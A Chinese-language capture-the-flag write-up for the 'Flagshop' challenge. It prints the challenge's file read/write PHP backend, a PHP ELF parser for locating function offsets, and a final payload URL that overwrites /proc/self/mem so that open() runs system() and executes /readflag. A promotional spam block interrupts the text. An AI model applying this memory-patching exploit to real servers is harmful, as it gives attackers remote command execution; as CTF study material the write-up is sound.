西湖論劍 Flagshop 分析復現

前言

比賽時候沒能做出來，其實這道題就是一道pwn題。後面與p w n師傅討論分析EXP分析還原瞭解題過程。學到了很多，也希望分享給大家。

任意檔案讀取

抓包或者看原始碼就會發現有一個SSRF，但是沒有許可權讀flag，測試發現存在一個readflag的elf檔案。

【——全網最全的網路安全學習資料包分享給愛學習的你，關注我，私信回覆“領取”獲取——】

1.網路安全多個方向學習路線

2.全網最全的CTF入門學習資料

3.一線大佬實戰經驗分享筆記

4.網安大廠面試題合集

5.紅藍對抗實戰技術秘籍

6.網路安全基礎入門、Linux、web安全、滲透測試方面影片

讀取題目全部原始碼：

backend。php

<？php$offset = isset（$_GET［‘offset’］）？ $_GET［‘offset’］： 0；$buffer = isset（$_GET［‘buffer’］）？ $_GET［‘buffer’］： “”；if （isset（$_GET［‘writefile’］）） { $fp = fopen（$_GET［‘writefile’］， “a”）； fseek（$fp， $offset）； fwrite（$fp， $buffer）； fclose（$fp）；}if （isset（$_GET［‘readfile’］）） { echo file_get_contents（$_GET［‘readfile’］）；}？>

index。php

<？phpif（！isset（$_COOKIE［‘sandbox’］）） { $uuid = system（“/var/www/html/copy”）； setcookie（“sandbox”， $uuid）； header（“Location： sandbox/”。$uuid）；} else { header（“Location： sandbox/”。$_COOKIE［‘sandbox’］）；}

檔案寫入

從原始碼可以知道，這裡是存在一個檔案寫入的問題，但是測試和對copy這個elf檔案反編譯發現，網站根目錄是沒有寫入許可權的。但是測試發現tmp目錄是可寫的。

做到這裡基本沒思路了。後面看了下Nul1的wp，發現這就是這道pwn題改的。（https：//www。pianshen。com/article/4537767804/）

記憶體洩露和動態連結庫

/proc/self/maps

包含了當前程序對映的記憶體區域以及他們的訪問許可權。檔案格式如下：

address perms offset dev inode pathname08048000-08056000 r-xp 00000000 03：0c 64593 /usr/sbin/gpm08056000-08058000 rw-p 0000d000 03：0c 64593 /usr/sbin/gpm08058000-0805b000 rwxp 00000000 00：00 040000000-40013000 r-xp 00000000 03：0c 4165 /lib/ld-2。2。4。so40013000-40015000 rw-p 00012000 03：0c 4165 /lib/ld-2。2。4。so4001f000-40135000 r-xp 00000000 03：0c 45494 /lib/libc-2。2。4。so40135000-4013e000 rw-p 00115000 03：0c 45494 /lib/libc-2。2。4。so4013e000-40142000 rw-p 00000000 00：00 0bffff000-c0000000 rwxp 00000000 00：00 0

透過SSRF漏洞直接讀取

/proc/self/maps

來洩露當前程式呼叫的到動態連結庫和記憶體地址。

直接把/lib/x86_64-linux-gnu/libc-2。19。so透過SSRF讀取然後下載下來，透過readelf來檢視system的地址。可以得知system函式的偏移是：

0x0000000000046590

我們將動態連結庫的地址加上

system

的偏移就能計算出

system

函式的地址。

<？phpecho dechex（0x7ffff5f40000+0x0000000000046590）；//system函式結果：0x7ffff5f86590？>

計算偏移

我們知道system函式的地址，我們就可以將open函式的地址替換為

system

函式的地址，我們在

file_get_contents

傳入引數為系統命令實際執行的卻是system函式，這樣我們將readflag的結果輸出到檔案，或者反彈shell。這樣我們下一步就是要計算open函式在二進位制檔案中的實際偏移，最後直接修改記憶體。

這裡需要用到

/proc/self/exe

在Linux2。2的核心及其之後，/proc/pid/exe是直接執行的二進位制檔案的符號連結。這個符號連結能夠被取消。嘗試開啟這個檔案就相當與打開了二進位制檔案，甚至可以透過重新輸入/proc/pid/exe重新執行一個對應於pid的二進位制檔案。在一個多執行緒的程式中，如果主執行緒已經退出了，就無法訪問這個符號連結。

在Linux2。0及其之前，/proc/pid/exe是指向當前程序執行的二進位制檔案。

同樣我們之間將其搞下來，用下面指令碼來計算open函式的偏移。

<？phpfunction packlli（$value） { $higher = （$value & 0xffffffff00000000） >> 32； $lower = $value & 0x00000000ffffffff； return pack（‘V2’， $lower， $higher）；}function unp（$value） { return hexdec（bin2hex（strrev（$value）））；}function parseelf（$bin_ver， $rela = false） { $bin = file_get_contents（$bin_ver）； $e_shoff = unp（substr（$bin， 0x28， 8））； $e_shentsize = unp（substr（$bin， 0x3a， 2））； $e_shnum = unp（substr（$bin， 0x3c， 2））； $e_shstrndx = unp（substr（$bin， 0x3e， 2））； for（$i = 0； $i < $e_shnum； $i += 1） { $sh_type = unp（substr（$bin， $e_shoff + $i * $e_shentsize + 4， 4））； if（$sh_type == 11） { // SHT_DYNSYM $dynsym_off = unp（substr（$bin， $e_shoff + $i * $e_shentsize + 24， 8））； $dynsym_size = unp（substr（$bin， $e_shoff + $i * $e_shentsize + 32， 8））； $dynsym_entsize = unp（substr（$bin， $e_shoff + $i * $e_shentsize + 56， 8））； } elseif（！isset（$strtab_off） && $sh_type == 3） { // SHT_STRTAB $strtab_off = unp（substr（$bin， $e_shoff + $i * $e_shentsize + 24， 8））； $strtab_size = unp（substr（$bin， $e_shoff + $i * $e_shentsize + 32， 8））； } elseif（$rela && $sh_type == 4） { // SHT_RELA $relaplt_off = unp（substr（$bin， $e_shoff + $i * $e_shentsize + 24， 8））； $relaplt_size = unp（substr（$bin， $e_shoff + $i * $e_shentsize + 32， 8））； $relaplt_entsize = unp（substr（$bin， $e_shoff + $i * $e_shentsize + 56， 8））； } } if（$rela） { for（$i = $relaplt_off； $i < $relaplt_off + $relaplt_size； $i += $relaplt_entsize） { $r_offset = unp（substr（$bin， $i， 8））； $r_info = unp（substr（$bin， $i + 8， 8）） >> 32； $name_off = unp（substr（$bin， $dynsym_off + $r_info * $dynsym_entsize， 4））； $name = ‘’； $j = $strtab_off + $name_off - 1； while（$bin［++$j］！= “\0”） { $name 。= $bin［$j］； } if（$name == ‘open’） { return $r_offset； } } } else { for（$i = $dynsym_off； $i < $dynsym_off + $dynsym_size； $i += $dynsym_entsize） { $name_off = unp（substr（$bin， $i， 4））； $name = ‘’； $j = $strtab_off + $name_off - 1； while（$bin［++$j］！= “\0”） { $name 。= $bin［$j］； } if（$name == ‘__libc_system’） { $system_offset = unp（substr（$bin， $i + 8， 8））； } if（$name == ‘__open’） { $open_offset = unp（substr（$bin， $i + 8， 8））； } } return array（$system_offset， $open_offset）； }}$open_php = parseelf（‘exe’， true）；//$maps = file_get_contents（‘lib。txt’）；//$pie_base =（hexdec（explode（‘-’， $maps）［0］））；echo $open_php；//結果：15333784？>

修改程序記憶體

/proc/self/mem是程序的記憶體內容，透過修改該檔案相當於直接修改當前程序的記憶體。該檔案不能直接讀取，需要結合maps的對映資訊來確定讀的偏移值。即無法讀取未被對映的區域，只有讀取的偏移值是被對映的區域才能正確讀取記憶體內容。

也就是說我們剛才從maps和動態連結庫計算出system的地址需要修改mem來使得open的地址變成system的地址。既然我們偏移地址和檔案偏移都算出來了直接構造payload即可。

backend。php？readfile=/readflag>/tmp/i_o_u_hlq&writefile=/proc/self/mem&buffer=%90%65%f8%f5%ff%7f&offset=15333784

直接讀取

/tmp/i_o_u_hlq

就可以直接

getflag